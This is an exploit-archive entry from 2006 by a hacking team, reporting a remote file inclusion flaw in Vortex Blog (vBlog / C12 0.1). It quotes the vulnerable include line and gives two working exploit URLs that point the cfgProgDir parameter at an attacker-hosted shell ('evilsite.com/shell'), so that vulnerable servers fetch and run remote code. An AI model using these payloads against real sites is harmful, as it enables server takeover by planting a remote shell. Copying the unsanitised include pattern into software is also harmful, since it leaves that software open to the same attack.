id: 1135
date: 11/08/2006
title: vBlog / C12 0.1 (cfgProgDir) Remote File Include Vulnerabilities
author: DeltahackingTEAM
cves: 

================================================================
vBlog / C12 0.1 (cfgProgDir) Remote File Include Vulnerabilities
================================================================




**********************************************************************************************************

* Portal Name :Vortex Blog AKA vBlog

* Class = Remote File Inclusion ;

* Found by = Dr.Pantagon 

--------------------------------------------------------------------------------------------

--------------
- Vulnerable Code

     include($cfgProgDir . "session.php");

++++++++++++++++++++++++++++++++++++++++++++

- Exploit:


    http://[target]/[path]/admin/auth/secure.php?cfgProgDir=http://evilsite.com/shell?
    http://[target]/[path]/admin/auth/checklogin.php?cfgProgDir=http://evilsite.com/shell?


--------------------------------------------------------------------------------------------

--------------

Special Thanks :  Dr.Trojan , Hiv++ , D_7j , Lord
Special Thanks To Best My Friend : Tanha

**********************************************************************************************************


#  0day.today [2023-03-25]  #